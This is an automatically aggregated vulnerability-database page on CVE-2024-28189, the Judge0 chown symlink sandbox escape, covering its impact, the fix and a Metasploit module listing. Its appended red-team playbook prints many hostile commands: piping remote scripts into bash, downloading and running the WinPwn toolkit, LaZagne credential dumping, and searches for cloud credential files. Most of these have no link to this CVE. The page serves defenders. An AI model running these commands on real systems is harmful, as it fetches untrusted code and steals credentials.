CVE-2024-28189
Overview
This vulnerability is a symbolic link (symlink) attack enabling unauthorized file ownership changes via the UNIX chown command. The root cause lies in Judge0's handling of untrusted files within its sandbox environment, specifically the execution of chown on user-controlled files without validating symlinks. The affected component is the sandboxed file execution system that manages file ownership operations during code execution.
Vulnerability Description
Judge0 is an open-source online code execution system. The application uses the UNIX chown command on an untrusted file within the sandbox. An attacker can abuse this by creating a symbolic link (symlink) to a file outside the sandbox, allowing the attacker to run chown on arbitrary files outside of the sandbox. This vulnerability is not impactful on it's own, but it can be used to bypass the patch for CVE-2024-28185 and obtain a complete sandbox escape. This vulnerability is fixed in 1.13.1.
Impact
An unauthenticated attacker with the ability to submit code or files to Judge0 can exploit this vulnerability to change ownership of arbitrary files outside the sandbox, leading to a complete sandbox escape. This enables privilege escalation and potential system compromise. The attack requires no user interaction or privileges (CVSS vector AV:N/AC:L/PR:N/UI:N). This undermines the integrity and isolation guarantees of the sandbox environment, facilitating further exploitation.
Solution
Upgrade Judge0 to version 1.13.1 or later, where this vulnerability has been addressed. Refer to the official GitHub security advisories GHSA-3xpw-36v7-2cmg and GHSA-h9g2-45c8-89cf for detailed patch instructions and commit f3b8547b3b67863e4ea0ded3adcb963add56addd implementing the fix. No additional workarounds are recommended beyond applying the vendor-provided update.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the open-source online code execution system arises from the improper use of the UNIX chown command on untrusted files within a sandbox environment. This flaw allows an attacker to create a symbolic link (symlink) pointing to a file outside the intended execution environment. When the chown command is executed on this symlink, it can inadvertently change the ownership of the target file, which resides outside the sandbox. This behavior is particularly concerning because it not only exposes the system to unauthorized file access but also facilitates a means to bypass security measures implemented to contain malicious code execution. The flaw's severity is amplified by its potential to be exploited in conjunction with other vulnerabilities, leading to a complete escape from the sandbox.
Attack vectors exploiting this vulnerability are varied and can be executed with relative ease by a malicious actor. An attacker could leverage a crafted payload that creates a symlink to a sensitive file on the host system, such as configuration files or user data. Once the symlink is established, the attacker can trigger the execution of the chown command, effectively altering the ownership of the linked file. This could lead to unauthorized access to critical system files or sensitive information, thereby compromising the integrity and confidentiality of the system. Furthermore, the ability to bypass existing security patches for related vulnerabilities enhances the risk, as it allows attackers to exploit a known weakness to escalate their privileges and gain broader access to the system.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the affected code execution system for processing untrusted code submissions. The potential for a complete sandbox escape poses a severe business risk, as it could lead to data breaches, unauthorized access to sensitive information, and potential disruptions to services. Organizations that handle user-generated content or provide online coding platforms may find themselves liable for data loss or regulatory non-compliance if such vulnerabilities are exploited. The reputational damage associated with a successful attack can also have long-lasting effects on customer trust and brand integrity.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security strategy. Regular updates and patches to the code execution system are essential, particularly after the release of fixes for known vulnerabilities. Monitoring for unusual file ownership changes and symlink creation can help identify potential exploitation attempts. Additionally, employing strict access controls and sandboxing techniques can limit the impact of any successful attack. Utilizing security tools that analyze code submissions for malicious patterns can further enhance the defense against exploitation. Organizations should also conduct regular security audits and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the vulnerability associated with the improper handling of the chown command in the online code execution system presents a critical risk that can lead to severe consequences if left unaddressed. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare their defenses against exploitation. Implementing robust detection and mitigation strategies is crucial to safeguarding sensitive information and maintaining the integrity of systems that rely on executing untrusted code.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Judge0 sandbox escape
exploits/linux/http/judge0_sandbox_escape_cve_2024_28189
|
Tanto Security, Takahiro Yokoyama | Unknown | unix, linux | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-27 | Leveraging Race Conditions via Symbolic Links |
37%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-28189 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/judge0/judge0/security/advisories/GHSA-3xpw-36v7-2cmg |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/judge0/judge0/security/advisories/GHSA-h9g2-45c8-89cf |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/judge0/judge0/commit/f3b8547b3b67863e4ea0ded3adcb963add56addd |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/judge0/judge0/blob/v1.13.0/app/jobs/isolate_job.rb#L232 |